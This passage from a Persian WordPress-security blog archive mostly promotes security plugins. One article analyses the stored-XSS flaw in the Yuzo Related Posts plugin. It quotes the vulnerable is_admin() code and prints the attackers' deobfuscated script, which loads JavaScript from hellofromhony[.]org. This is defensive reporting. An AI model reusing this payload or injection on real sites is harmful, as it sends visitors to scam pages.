دیجی اسکریپت

افزونه امنیتی وردپرس Archives | دیجی اسکریپت

افزونه WP Cerber Security PRO – افزونه امنیتی برای وردپرس

WP Cerber Security PRO نام یک افزونه امنیتی با امکاناتی گسترده و جالب توجه برای وردپرس است. این افزونه می تواند وبسایت شما را در برابر حملات هکر ها، انواع اسپم، تروجان و بد افزار ها حفاظت کرده و خیال شما را از بسیاری از زوایای امنیتی سایتتان آسوده کند. افزونه سربر سکوریتی دارای یک سیستم پیشرفته مانیتورینگ می باشد که به صورت ۲۴ ساعاته تمامی فایل های درون هاست و رفتار های کاربران را تحت بررسی قرار می دهد تا این اطمینان را به شما بدهد که امنیت وب سایت وردپرسی شما در بالاترین سطح خود قرار دارد همچنین این افزونه یک سری دستورالعمل هایی برای افزایش امنیت در اختیار شما قرار می دهد که با پیروی از آنها سایت شما از تمامی حملات احتمالی مصون می ماند. در ادامه به برخی دیگر از امکانات این افزونه به صورت کلی نیز اشاره می کنیم

 

افزونه WP Cerber Security PRO   افزونه امنیتی برای وردپرس

 

برخی از امکانات افزونه امنیتی WP Cerber Security PRO :

  • سیستم پیشرفته ضد هرزنامه
  • دارای لایه های امنیتی متفاوت
  • امکان ایجاد قوانین و دستورات برای فایروال
  • سیستم اطلاع رسانی از نوع حملات
  • مسدود سازی آی پی مهاجمین
  • مانیتورینگ کامل بدون وقفه
  • ضد بد افزار و جلوگیری از فعالیت بدافزار و شل و…
  • بستن آی پی ها بر اساس موقعیت جغرافیای
  • قابلیت بررسی امنیت افزونه و قالب ها
  • راه اندازی آسان
  • و..

۴
/
۵
(
۱

امتیاز

)

نوشته افزونه WP Cerber Security PRO – افزونه امنیتی برای وردپرس اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی وردپرس Blackhole Pro

Blackhole Pro نام یک افزونه امنیتی برای وردپرس است که به صورت خودکار ربات های بد را در سایت شما تشخیص داده و به دام می اندازد. ربات های بد جزو خطرناک ترین موارد امنیتی در وبسایت شما هستند، این ربات ها می توانند کارهای مختلفی علیه امنیت وبسایت شما انجام داده و منابع سرور شما را هدر دهند. افزونه وردپرس Blackhole Pro به شما کمک می کند تا این ربات های بد را متوقف کنید و منابع سرور را برای بازدید کنندگان واقعی نگهداری کنید.

 

افزونه امنیتی وردپرس Blackhole Pro

 

طرز کار این ربات به این صورت است که یک لینک پنهان به صفحات شما اضافه می کند. شما یک قانون به robots.txt اضافه می کنید که ربات ها را از دنبال کردن لینک منع می کند. ربات های خوب از این قانون پیروی می کنند، اما ربات های بد لینک را دنبال کرده و در تله ای که توسط افزونه ایجاد می شود به دام می افتند و مسدود می شوند. با این کار دیگر ربات های بد نمی تواند دسترسی بیشتری به کل وبسایت شما داشته باشند.

 

افزونه امنیتی وردپرس Blackhole Pro

 

از قابلیت های اصلی افزونه Blackhole Pro می توان به متوقف کردن اسکنرها، اسپم ها و leech، بهبود کیفیت ترافیک و امنیت کلی سایت، ذخیره سازی منابع سرور برای ربات های خوب، قابلیت سفارشی سازی آسان، پشتیبانی از ایمیل اطلاع رسانی، پشتیبانی از پیام هشدار، ارسال پیام مسدود سازی، قابلیت تغییر مسیر، قابلیت سفارشی سازی کدهای وضعیت HTTP، رابط کاربری عالی برای مدیریت رباتهای مسدود شده، قابلیت فیلتر ربات ها در نتایج جستجو، امکان مرتب سازی ربات های مسدود شده، جستجوی خودکار موقعیت مکانی Geo / IP برای هر ربات، قابلیت انتخاب همزمان چندین ربات و حذف دسته جمعی آنها و بسیاری قابلیت های دیگر اشاره کرد.

 

امکانات افزونه امنیتی وردپرس BLACKHOLE PRO:

  • امکان افزودن دستی ربات ها با استفاده از آدرس IP به صورت دستی
  • قابلیت انتخاب هشدار ایمیل از بین چندین نوع هشدار
  • قابلیت سفارشی سازی قالب ایمیل اطلاع رسانی با کد کوتاه
  • ارسال ایمیل اطلاع رسانی جداگانه برای هر ربات مسدود شده
  • امکان تغییر مسیر ربات های مسدود شده با URL اختصاصی
  • قابلیت ایجاد trigger link استثنا در هر پست یا صفحه
  • قابلیت افزودن ربات ها به لیست سفید
  • امکان ایجاد دسترسی همیشگی برای موتورهای جستجوی محبوب
  • قابلیت انتخاب URL دلخواه بریا ربات های لیست سفید
  • ساخته شده با WP API
  • سازگاری با سایر افزونه های امنیتی وردپرس
  • ثبت تعداد دفعات مسدود شدن یک ربات
  • بدون نیاز به htaccess
  • سازگاری با آخرین نسخه های وردپرس
  • و بسیاری امکانات دیگر

۳
/
۵
(
۱

امتیاز

)

نوشته افزونه امنیتی وردپرس Blackhole Pro اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی Zxeion | فایروال و مخفی سازی وردپرس

Zxeion یک افزونه قدرتمند برای محافظت و جلوگیری از هک شدن سایت وردپرسی شماست! افزونه امنیت وردپرس و فایروال حاوی مجموعه ای از اصلاحات و ابزارهای محافظتی و امنیتی است که شما را قادر میسازد سایت خود را تبدیل به یک سایت امن و ضد هک تبدیل کنید! با استفاده از این افزونه شما میتوانید از تمامی تهدیدات جلوگیری کنید و همزمان از پایگاه شبکه نیز محافظت میکند! در ادامه به برخی دیگر از امکانات این افزونه به صورت کلی نیز ااشاره می کنیم

 

افزونه امنیتی Zxeion | فایروال و مخفی سازی وردپرس

 

محافظت از فایل های مهم سایت وردپرسی

  • محافظت از پیکربندی وردپرس
  • امنیت وردپرس
  • محافظت از Hotlink
  • محافظت از فایل های پنهان
  • محافظت از Htaccess
  • حفاظت از داده های CMS
  • CSP Protection
  • محافظت از فایل PHP
  • محافظت از اسکریپت (XSS)

محافظت از حملات زمانی و روبات ها

  • تشخیص روبات از انسان
  • تلاش برای ورود ناموفق **

دیواره آتش (فایروال)

  • اطلاعات فن آوری سرور
  • اطلاعات سرور نرم افزار
  • نام کاربری
  • محافظت از نیروی SSL
  • امنیت حمل و نقل سخت HTTP) HSTS)
  • بهینه سازی فایل Robot.txt

سلامتی وب سایت و امنیت وردپرس

  • فشرده سازی Gzip
  • فیکسر سربرگ
  • رفع کننده ETags
  • جمع بندی پرونده
  • انفجار کش مبتنی بر نام پرونده

مخفی سازی وردپرس

  • نوع اتصال HTTP را وارد کنید **
  • صفحه ورود را مخفی کنید
  • نسخه وردپرس را مخفی کنید
  • رشته حفاظت از آدرس*
  • لوگوی WordPress را جایگزین کنید *

نوشته افزونه امنیتی Zxeion | فایروال و مخفی سازی وردپرس اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه فوق امنیتی وردپرس SecuPress Pro

SecuPress Pro نام یک افزونه امنیتی برای وردپرس است که قبلا نسخه رایگان آن را به شما معرفی کردیم و با استفاده از آن می توانید از وبسایت خود محافظت کنید. این افزونه مشکلات امنیتی سایت را به سرعت شناسایی و اصلاح می کند همچنین دارای قابلیت ضد نفوذ نیز می باشد که هرگونه تلاش برای هک وبسایت شما را مسدود می سازد و دسترسی به سایت شما را کنترل می کند. علاوه بر این داده های شما در یک مکان امن و محافظت شده ذخیره می شوند. افزونه SecuPress Pro اعتبار شما را تحت تاثیر قرار نخواهد داد و به هیچ وجه تاثیر منفی روی سئو سایت ندارد یا به عنوان اسپم و محتوای مخرب شناخته نمی شود.

 

افزونه فوق امنیتی وردپرس SecuPress Pro

 

از قابلیت های اصلی افزونه وردپرس SecuPress Pro می توان به اسکن و شناسایی ۳۵ نقطه امنیتی از وبسایت، محافظت از کلیدهای امنیتی، امکان مسدود کردن IP ها، امکان تغییر پیشوند پایگاه داده، امکان مسدود سازی بازدید ربات های بد، دارای فایروال و بسیاری امکانات دیگر اشاره کرد. همچنین این افزونه امکانی فراهم آورده تا بتوانید خلاصه ای از رویدادهای امنیتی سایتتان را از طریق ایمیل دریافت کنید. در ادامه مطلب به برخی دیگر از امکانات افزونه امنیتی Secupress نسخه پرو SecuPress Pro اشاره خواهیم کرد.

 

امکانات افزونه فوق امنیتی وردپرس SecuPress Pro:

  • دارای سیستم ضد حملات Brute Force
  • قابلیت انتقال به صفحه ورود
  • قابلیت اسکن نقاط امنیتی
  • پشتیبانی از افزونه ووکامرس
  • امکان پشتیبان گیری از فایل ها
  • دارای سیستم ضد اسپم
  • دارای سیستم هشدار و اطلاع رسانی
  • امکان تشخیص پلاگین ها و قالب های آسیب پذیر
  • قابلیت تایید هویت دو مرحله ای
  • امکان مسدود سازی IPها بر اساس موقعیت جغرافیایی
  • امکان مسدود سازی یک کشور خاص
  • امکان دریافت گزارش به صورت PDF
  • پشتیبانی از WPML
  • رابط کاربری زیبا
  • نصب و پیکربندی آسان
  • سرعت بارگذاری بالا
  • و بسیاری قابلیت های دیگر

نوشته افزونه فوق امنیتی وردپرس SecuPress Pro اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی وردپرس Wordfence Premium نسخه ۷٫۳٫۴

Wordfence نام یک افزونه امنیتی بسیار قدرتمند برای وردپرس است که قبلا نسخه رایگان آن را در اختیار شما کاربران عزیز قرار داده ایم، امروز قصد داریم نسخه پرمیوم این افزونه را به شما معرفی کنیم. افزونه وردپرس Wordfence شامل فایروال نهایی و اسکنر بدافزار است تا وب سایت وردپرسی شما را محافظت کند. این افزونه با جدیدترین قوانین فایروال، امضا های مخرب و آدرس های IP مخرب را لازم دارد تا امنیت وب سایت شما را تامین کند.

 

افزونه امنیتی وردپرس Wordfence Premium نسخه 7.3.4

 

افزونه امنیتی وردپرس

Wordfence در نقطه انتهایی سرور شما اجرا می شود تا حفاظت بهتری از فایروال های ابری برای شما فراهم کند. فایروال Wordfence اطلاعات هویت کاربر را در بیش از ۸۵٪ از قوانین فایروال دربر می گیرد، چیزی که فایروال های ابری به آن دسترسی ندارند. اسکنر Wordfence فایلهای اصلی، تم ها و پلاگین ها را برای یافتن بدافزارها، URL های بد، اسپم سئو، هرزنامه های تبلیغاتی، تغییر مسیرهای مخرب و تزریق کد بررسی می کند.

 

افزونه امنیتی وردپرس Wordfence Premium نسخه 7.3.4

 

از قابلیت های اصلی افزونه Wordfence می توان به اسکنر موثر و قدرتمند، بدون نیاز به شکستن رمزنگاری، شناسایی و مسدود کردن ترافیک مخرب، امکان ادغام عمیق فایروال با وردپرس، مسدود کردن درخواست های مخرب، محدود کردن تلاش ها برای ورود به وبسایت، اجرای کلمات عبور قوی، افزایش سرعت سایت، گزارش تغییرات و بسیاری قابلیت های دیگر اشاره کرد. همچنین این افزونه با بررسی محتوا شما را از وجود فایل ها، پست ها و نظرات حاوی url مخرب مطمئن می کند. در ادامه مطلب به برخی دیگر از امکانات پلاگین امنیتی Wordfence نسخه پرمیوم اشاره خواهیم کرد.

 

امکانات افزونه امنیتی وردپرس Wordfence Premium:

  • امکان مسدود سازی آی پی کشورها
  • امکان تعمیر فایل ها
  • شامل تایید اعتبار دو مرحله ای
  • محافظت از لو رفتن رمز عبور
  • امکان مسدود سازی فعالیت ربات های مشکوک
  • سیستم مسدود سازی دستی
  • امکان مسدود سازی مرورگرهای خاص
  • سازگاری با سایر پلاگین های وردپرس
  • مسدود کردن شبکه های مخرب
  • و بسیاری امکانات دیگر

نوشته افزونه امنیتی وردپرس Wordfence Premium نسخه ۷٫۳٫۴ اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

گاهی اوقات هک شدن سایت‌ها دلایل خیلی پیچیده‌ای ندارد و با یک اتفاق ساده مانند یک افزونه آسیب پذیر در وردپرس مواجه هستیم. چنین افزونه‌ای نیز می‌تواند امنیت سایت ما را تهدید کرده و باعث تخریب شود. چندی پیش خبر حمله به سایت با Easy WP SMTP را شنیدیم که با بروزرسانی افزونه مشکل برطرف شد. امروز نیز افزونه دیگری را معرفی می‌کنیم که با حذف آن می‌توان به جلوگیری از هک شدن در وردپرس کمک کرد.

 

افزونه Yuzo Related Posts که روی بیش از ۶۰۰۰۰ سایت وردپرسی نصب بود، در تاریخ ۳۰ مارس ۲۰۱۹ از مخزن وردپرس پاک شد و این امر به خاطر آسیب پذیری ناخواسته این افزونه و بی مسئولیتی توسعه دهندگان بود. در همان روز خبر آسیب پذیری آن توسط یک محقق امنیتی پخش شد. اکنون حملات XSS در حال سوء استفاده از این آسیب پذیری هستند. به نظر می‌رسد این حملات با حملاتی که به افزونه های Easy WP SMTP و Social Warfare شد ارتباط داشته باشد.

 

جلوگیری از هک شدن در وردپرس

قابلیت محافظت در برابر حملات XSS در افزونه Wordfence اکنون جلوی این گونه حملات را گرفته و هر دو دسته از افرادی که از نسخه رایگان و پرمیوم این افزونه استفاده می‌کنند در برابر حملات XSS محافظت خواهند شد. براساس نتایج بررسی عمیق ضعف امنیتی موجود، تیم توسعه دهنده افزونه Wordfence در نسخه جدید قابلیت محافظت در برابر حملات دیگر و جلوگیری از هک شدن در وردپرس را نیز اضافه کرده است. البته کاربرانی که از نسخه رایگان استفاده می‌کنند، این قابلیت‌ها را کمی دیرتر دریافت خواهند کرد.

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

تابع ()is_admin حادثه آفرید

آسیب پذیری افزونه Yuzo Related Posts از عدم وجود احراز هویت در قسمت‌های مختلف افزونه که مربوط به ذخیره سازی تنظیمات افزونه در پایگاه داده هستند سرچشمه می‌گیرد. کد زیر در مسیر assets/ilenframework/core.php اصل مشکل افزونه است:

function __construct(){
if( ! is_admin() ){ // only front-end
self::set_main_variable();
return;
}elseif( is_admin() ){ // only admin
// set default if not exists
self::_ini_();

بعضی از توسعه دهندگان وردپرس به اشتباه، از تابع ()is_admin برای بررسی اینکه یک قطعه کد که نیازمند امتیاز مدیر کل است باید اجرا شود یا خیر استفاده می‌کنند، اما طبق مستندات وردپرس، این راه درست استفاده از این تابع نیست. در این سناریو، تابع ()_self::_ini برای تمامی صفحات ادمین مثل /wp-admin/options-general.php و /wp-admin/admin-post.php فراخوانی می‌شود که باعث شده یک پست به صفحات ذکر شده درخواست پردازش با استفاده از تابع ;()self::save_options ارسال کند تا بعدا توسط کد مذکور انجام شود.

 

نتیجه حاکی از حضور افزونه آسیب پذیر در وردپرس

نتیجه این است که یک حمله کننده که احراز هویت نشده است می‌تواند محتوای مخرب به سایت تزریق کند؛ مثل تزریق یک payload جاوا اسکریپت در تنظیمات افزونه که بتواند از این آسیب پذیری استفاده کند. این payload در قالب‌های HTML وارد می‌شود و توسط مرورگر کاربرانی که از این سایت‌های خطرناک استفاده می‌کنند، اجرا می‌شود. این مشکل امنیتی می‌تواند منجر به عدم دسترسی افراد به سایت شود یا اینکه آن‌ها را به سایت‌های نا امن منتقل کند یا در شرایطی با حساب کاربری ادمین کاری نداشته باشد و با آن مدارا کند. اما به هر حال باید عملیات جلوگیری از هک شدن در وردپرس انجام شود.

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

سوء استفاده از این شکاف امنیتی می‌تواند منجر به ریدایرکت‌های مشکوک شود

اکنون پس از اینکه این افزونه آسیب پذیر در وردپرس با بی توجهی توسعه دهندگان افشا و وجود آن نیز ثابت شد، برخی از افزاد سودجو شروع به سوء استفاده و بهره برداری از سایت‌هایی کردند که افزونه Yuzo Related Posts را روی سایت خود نصب کرده بودند.

هم اکنون نیز این سوء استفاده‌ها در برخی از کدهای جاوا اسکریپت مثل کد مقدار yuzo_related_post_css_and_style دیده می‌شود که بصورت زیر است:

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

بعد از رفع ابهام، مشخص می‌شود که کد بالا در حال انجام چه کاری است:

</style><script language=javascript>var elem=document.createElement('script');
elem.type='text/javascript';
elem.async=true;
elem.src='https://hellofromhony[.]org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

وقتی کاربری از سایت تخریب شده‌ای که شامل payload بالا است، بازدید می‌کند، به صفحات کلاه‌برداری منتقل می‌شود. مثل صفحه زیر:

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

۳ آسیب پذیری خطرناک و مشترک

تحقیقات نشان می دهد که تعداد حملات برای سوء استفاده از این افزونه آسیب پذیر در وردپرس انجام گرفته است، با تعداد حملاتی که بر روی شکاف امنیتی دو افزونه Social Warfare و Easy WP SMTP انجام گرفته است مشترکاتی دارد.

 

تا کنون در این حمله‌ها از یک اسکریپت مخرب که در hellofromhony[.]org میزبانی می‌شود، استفاده شده که تبدیل به آدرس۵۳ [.]۱۷۶٫۱۲۳٫۹ خواهد شد؛ همان IP که در حمله‌های افزونه های Social Warfare و Easy WP SMTP استفاده شد. هر سه این حمله‌ها از نوع stored XSS بود که کدهای مخرب را از طریق این شکاف امنیتی تزریق می‌کرد و کاربران را به صفحات دیگر و خطرناک ارجاع می‌داد. اکنون مطمئن هستیم که افراد سودجوی پشت این حمله‌های مخرب، مشترک هستند. و باید به سرعت عملیات جلوگیری از هک شدن در وردپرس را آغاز کرد.

 

نتیجه نهایی

همانطور که گفته شد، شکاف امنیتی یکی از افزونه های محبوب فاش شد که افرادی از این شکاف‌های امنیتی سوء استفاده کردند. همین امر، موضوع داشتن یک رویکرد امنیتی که شامل فایروال وردپرس می‌شود را برجسته‌تر می‌کند.

سایت‌هایی که این افزونه را نصب کرده‌اند، باید فورا آن را پاک کنند؛ حداقل تا زمانی که توسعه دهندگان این افزونه نسخه امن آن را ارائه کنند. کاربرانی که از افزونه Wordfence استفاده می‌کنند از شر این حملات در امان هستند. قوانین فایروال جدیدی بر روی افزونه قرار گرفته است که جلوی این حملات مخرب را بگیرد و طی چند روز آینده روی نسخه رایگان نیز اعمال خواهد شد.

نوشته جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی Wordfence Security وردپرس نسخه ۷٫۲٫۴

Wordfence Security نام افزونه کاربردی وردپرس می‌باشد که به وسیله آن می‌توانید امنیت وبسایت وردپرسی خود را به صورت چشمگیری افزایش دهید. همان طور که می‌دانید وردپرس یک سیستم مدیریت محتوا محبوب در جهان می‌باشد که از لحاظ امنیت در وضعیت مناسبی قرار دارد، ولی می‌توان با انجام برخی از روش ها، امنیت آن را ارتقا داده و از دسترسی افراد ناشناس و خرابکار، به وبسایت خود جلوگیری کرد. این افزونه با در اختیار گذاشتن امکانات مختلف به شما کمک خواهد کرد تا بتوانید به آسانی ترافیک موجود در وبسایت خود بررسی کرده و از نفوذ افراد غیرمجاز جلوگیری کنید.

افزونه افزایش امنیت وردپرس Wordfence Security دارای فایروال حرفه ای بوده که می‌تواند ترافیک ها و افراد مخرب را شناسایی کرده و مسدود کند. همچنین این افزونه دارای بخش اسکنر نیز بوده که می‌توانید فایل ها مختلف وبسایت شما که می‌تواند شمال : پوسته، افزونه ها و موارد دیگری که آپلود کرده اید را بررسی کرده و در صورت آلوده بودن به کدهای مخرب، از فعالیت آن ها جلوگیری کند. همچنین شما می‌توانید صورت نیاز افراد دلخواه خود را مسدود کرده و یا از دسترسی یک کشور خاص جلوگیری کنید. در ادامه می‌توانید ویژگی های دیگر این افزونه را مطالعه کنید.

افزونه امنیتی Wordfence Security وردپرس نسخه 7.2.4

قابلیت های افزونه امنیتی Wordfence Security وردپرس نسخه ۷٫۲٫۴

  • شامل فایروال حرفه ای
  • دارای اسکنر حرفه ای
  • حفاظت از رمزهای عبور
  • بررسی زنده ترافیک وبسایت
  • مسدود کردن پیشرفته به صورت دستی
  • مسدود کردن کاربران کشورهای خاص
  • تعمیر فایل ها
  • ایجاد تایید هویت دو مرحله ای
  • و امکانات دیگر…

نوشته افزونه امنیتی Wordfence Security وردپرس نسخه ۷٫۲٫۴ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه 5.6.1

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

  • تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
  • تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
  • تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
  • تغییر لینک نمایش وردپرس
  • تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
  • تغییر و یا غیر فعال کردن فید
  • مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
  • غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
  • به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
  • اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
  • فشرده سازی خروجی HTML و حذف نظرات در کد منبع
  • حذف متا اطلاعات وردپرس از هدر و خوراک
  • تغییر ایمیل پیش فرض وردپرس
  • صفحه سفارشی ۴۰۴!
  • حذف کلاس های منو های غیر ضروری
  • پاک کردن کلاس های بادی
  • و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه 5.6

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

  • تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
  • تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
  • تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
  • تغییر لینک نمایش وردپرس
  • تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
  • تغییر و یا غیر فعال کردن فید
  • مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
  • غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
  • به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
  • اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
  • فشرده سازی خروجی HTML و حذف نظرات در کد منبع
  • حذف متا اطلاعات وردپرس از هدر و خوراک
  • تغییر ایمیل پیش فرض وردپرس
  • صفحه سفارشی ۴۰۴!
  • حذف کلاس های منو های غیر ضروری
  • پاک کردن کلاس های بادی
  • و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶

افزونه iThemes Security Pro جزو افزونه هایی است که جای آن در هیچ سایت قدرت گرفته از وردپرسی نباید خالی باشد. حال اگر میخواهید چند قدم از دیگر جلو تر باشید و امنیت وبسایت خود را به شکل چشمگیری افزایش دهید، بهتر است از نسخه ی حرفه ای این افزونه یعنی iThemes Security Pro استفاده کنید. افزونه iThemes Security Pro علاوه بر دارا بودن امکانات نسخه ی رایگان خود، امکانات جدید و جالبی را به شما ارائه میکند که میتوانند در امن کردن سایت وردپرسی شما به شکل چشمگیری موثر باشند. در ادامه سعی میکنیم به امکانات بخش های مختلف افزونه iThemes Security Pro اشاره کنیم. با ما همراه باشید.

افزونه فوق امنیتی وردپرس Security Pro نسخه 5.5.6

محافظت در برابر حملات Brute Force

با استفاده از تنظیمات مخصوص جلوگیری از حملات بروت فورس در افزونه iThemes Security pro میتوانید حداکثر دفعات تلاش ناموفق برای ورود به وردپرس را تعیین کنید. به این شک اگر کسی بخواهد با حدس زدن رمز به وردپرس لاگین کند، پس از رسیدن به حداکثر مجاز دفعات تلاش برای ورود، به صورت اتوماتیک بن شده و از دسترسی او به سایت جلوگیری خواهد شد.

تشخیص تغییر فایل ها

اگر کسی بتواند به نحوی به سایت شما نفوذ کند، یکی از اولین کارهاش تزریق کد مخرب به فایل های وردپرس شما خواهد بود. با ویژگی File change Detection در افزونه iThemes Security Pro میتوانید از طریق دریافت هشدار های ایمیلی از این مسئله آگاه شوید و در صورتی که وبسایت شما هک شده باشد، به سرعت اقدامات لازم را انجام دهید.

تشخیص خطای ۴۰۴

اگر یک ربات به دنبال تشخیص نقاط آسیب پذیر، وبسایت شما را اسکن کند، بدون شک به تعداد زیادی خطای ۴۰۴ برخورد خواهد کرد. با استفاده از ویژگی ۴۰۴ Detection شما میتوانید کاری کنید که در صورتی که شخصی در بازه ی زمانی مشخص، تعداد زیادی خطای ۴۰۴ دریافت کند، آدرس IP او به صورت اتوماتیک بن شده و از دسترسی او به سیستم جلوگیری شود.

اجبار استفاده از رمز قوی

یکی از موارد پایه ای که میتواند منجر به امن تر شدن سایت شما شود، استفاده از رمز های مناسب است. با استفاده از این ویژگی شما میتوانید کاربران سایت خود را مجبور به استفاده از رمز های قوی و مناسب کنید.

جلوگیری از دسترسی کاربران مشکوک

با استفاده از این ویژگی میتوانید با بن کردن آی پی افراد خرابکار، از دسترسی آنها به سیستم جلوگیری کند. افزونه iThemes Security Pro میتواند در صورتی که کاربری سعی در حدس زدن رمز برای ورود به سایت داشته باشد و یا دفعات خاصی با خطای ۴۰۴ مواجه شده باشد، به طور اتوماتیک از دسترسی او به سیستم جلوگیری کند. این افزونه همچنین به blacklist ربات ها نیز مجهز است و از این طریق میتواند جلوی دسترسی بات هایی که از قبل به عنوان خرابکار شناخته شده اند را بگیرد.

امکان قرارگیری در حالت Away Mode

اگر قرار است مدتی به ناحیه مدیریت وردپرس خود سر نزنید، با این ویژگی میتوانید امکان دسترسی به مدیریت وردپرس را برای ساعاتی خاص غیر فعال کنید تا شخص دیگری قادر به ورود به سیستم نباشد. مثلا اگر قصد دارید چند روزی به مسافرت بروید، این امکان میتواند گزینه ی مناسبی برای شما باشد.

تغییر آدرس مدیریت وردپرس

تغییر آدرس ورود به مدیریت وردپرس یکی از موارد امنیتی بسیار مهم است. وقتی آدرس ورود به ادمین وردپرس را تغییر میدهید، حدس زدن آن برای افراد خرابکار دشوار بوده و باعث میشود کسی نتواند با استفاده از اتک بروت فورس، رمز شما را پیدا کرده و وارد ناحیه مدیریت شود. چرا که شخص خرابکار در این حالت نمیداند از چه آدرسی میتواند به ناحیه مدیریت وردپرس دسترسی پیدا کند.

ایجاد بکاپ از دیتابیس

داشتن بکاپ های منظم از دیتابیس، همیشه باعث آسودگی خاطر است. اگر مرتبا از دیتابیس خود نسخه پشتیبان تهیه کنید، میتوانید مطمئن باشید که در صورت بروز مشکل، اطلاعات شما امن و قابل بازگردانی هستند. با استفاده از این امکان شما میتوانید بکاپ های دلخواه خود را تنظیم کرده و علاوه بر ذخیره ی آنها بر روی هاست، آنها را به صورت پیوست شده به ایمیل نیز دریافت کنید. برای ایجاد بکاپ های منظم، استفاده از افزونه BackupBuddy هم انتخاب بسیار مناسبی به شمار میرود.

ارسال هشدار های ایمیلی

هرگاه کسی بخاطر داشتن تعداد خاصی لاگین ناموفق به سیستم، بن شود و یا هرگاه فایلی در سایت شما تغییر کند، افزونه iThemes Security شما را از طریق ایمیل از این مسئله آگاه خواهد کرد.

تغییر کلید های امنیتی وردپرس

با استفاده از افزونه iThemes Security Pro میتوانید به سادگی کلید های امنیتی (salt) وردپرس را آپدیت کرده و از این طریق رده ی امنیت سایت خود را بالاتر ببرید.

مقایسه ی فایل ها به صورت آنلاین

